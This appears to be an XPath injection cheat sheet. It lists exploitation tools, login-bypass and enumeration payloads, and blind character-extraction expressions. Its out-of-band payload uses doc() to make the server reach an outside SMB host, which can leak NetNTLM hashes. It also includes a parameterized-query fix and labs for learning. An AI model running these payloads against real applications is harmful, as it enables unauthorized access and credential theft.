2022-10-12 10:13:55 +00:00
# XPATH Injection
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
    * [Blind Exploitation](#blind-exploitation)
    * [Out Of Band Exploitation](#out-of-band-exploitation)
* [Labs](#labs)
* [References](#references)
## Tools
- [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
- [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
- [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
- [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
- [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - XPath injection exploitation tool
## Methodology
Similar to SQL injection, the goal is to close the quoted string literal so that the rest of the input is evaluated as part of the XPath expression. A query built by string concatenation, like the one below, gives the input that power:
```java
// Vulnerable pattern: untrusted input is concatenated straight into the XPath expression,
// so a quote in vuln_var1 or vuln_var2 ends the literal and changes the predicate.
String query = "string(//user[name/text()='" + vuln_var1 + "' and password/text()='" + vuln_var2 + "']/account/text())";
```
```sql
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
')] | //user/*[contains(*,'
') and contains(../password,'c
') and starts-with(../password,'c
```
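The concatenated login query and the `' or '1'='1` payload above, run side by side with a parameterized version. This is an added example, not code from the original page; it assumes `lxml` is installed, and the user store and credentials are constructed sample data.

```python
from lxml import etree

# Constructed sample user store (not from the page).
USERS_XML = b"""<users>
  <user><name>admin</name><password>s3cret</password><account>ACCT-0001</account></user>
  <user><name>alice</name><password>wonderland</password><account>ACCT-0002</account></user>
</users>"""
DOC = etree.fromstring(USERS_XML)


def lookup_vulnerable(name: str, password: str) -> str:
    """Builds the query by string concatenation, exactly like the snippet above.
    The untrusted values become part of the XPath syntax, so a quote in the
    input closes the literal and rewrites the predicate."""
    query = ("string(//user[name/text()='" + name + "' and password/text()='"
             + password + "']/account/text())")
    return DOC.xpath(query)


def lookup_safe(name: str, password: str) -> str:
    """Binds the values as XPath variables ($name, $password). lxml hands them
    to the evaluator as data, so they are compared as strings and never parsed
    as XPath syntax, whatever characters they contain."""
    query = ("string(//user[name/text()=$name and password/text()=$password]"
             "/account/text())")
    return DOC.xpath(query, name=name, password=password)


def classic_bypass() -> tuple:
    """Runs the ' or '1'='1 payload through both builders. In the vulnerable
    query the predicate becomes  name='' or ('1'='1' and password='') or '1'='1'
    which is true for every user, so string() returns the first account without
    any valid password. The parameterized query matches no user and returns ''."""
    payload = "' or '1'='1"
    return lookup_vulnerable(payload, payload), lookup_safe(payload, payload)


if __name__ == "__main__":
    print(lookup_safe("alice", "wonderland"))  # ACCT-0002
    print(classic_bypass())                     # ('ACCT-0001', '')
```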
### Blind Exploitation
1. Determine the length of the string
```sql
and string-length(account)=SIZE_INT
```
2. Extract one character with `substring`, and compare it either to a literal character or to the value returned by the `codepoints-to-string` function (so the character can be expressed as an integer code point)
```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
```
### Out Of Band Exploitation
The `doc()` function makes an XPath 2.0 processor load an external document, so an injected UNC path causes the server itself to open an outbound connection to the named host (the NetNTLM reference below describes what such a connection leaks); egress filtering of SMB from application servers and an XPath engine that does not expose `doc()` both close this channel.
```http
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
```
## Labs
* [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication)
* [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String)
* [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind)
## References
- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
- [XPATH Injection - OWASP - January 21, 2015](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))